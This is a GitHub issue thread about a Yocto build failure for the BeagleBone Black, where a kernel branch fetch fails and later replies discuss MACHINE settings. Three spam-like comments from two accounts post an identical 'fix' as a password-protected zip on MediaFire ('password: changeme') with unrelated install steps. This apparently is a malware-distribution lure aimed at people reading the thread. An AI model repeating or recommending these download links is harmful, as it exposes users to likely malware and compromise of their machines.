beagleboard/linux #290: ERROR: i am trying to build yocto image for beaglebone black using meta-ti-bsp but i am facing a error

moaz-azam, 2024-08-26:
Using Meta-ti scarthgap branch,

it is fetching linux kernel from a source that is begin removed maybe?
ERROR: Task (/home/moaz/Yocto_learning/meta-ti/meta-ti-bsp/recipes-kernel/linux/linux-bb.org_git.bb:do_fetch) failed with exit code '1'
ERROR: linux-bb.org-6.1.80+git-r0 do_fetch: Bitbake Fetcher Error: FetchError('Unable to fetch URL from any source.', 'git://github.com/beagleboard/linux.git;protocol=https;branch=v6.1.80-ti-r34')

This particular branch don't exits now i am unable to find this branch here in this repository also

toufiksalhi, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

enricozao, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

enricozao, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

RobertCNelson, 2024-08-26:
It's right there... https://github.com/beagleboard/linux/tree/v6.1.80-ti-r34

moaz-azam, 2024-08-27:
I dont know whats the problem then do_fetch command failed multiple times. that is not main issue here it the problem with MACHINE ="beaglebone" its select 32 bit architecture. i am using beaglebone black . i researched a bit and find out that i need to use MACHINE=  "am335x-boneblack" in my local.conf file .  Can you please verify thanks.

RobertCNelson, 2024-08-27:
idk, i personally stay far away from yocto..

Amogh-Sadhu, 2026-05-04:
> I dont know whats the problem then do_fetch command failed multiple times. that is not main issue here it the problem with MACHINE ="beaglebone" its select 32 bit architecture. i am using beaglebone [...]

Try using MACHINE= "beaglebone-yocto"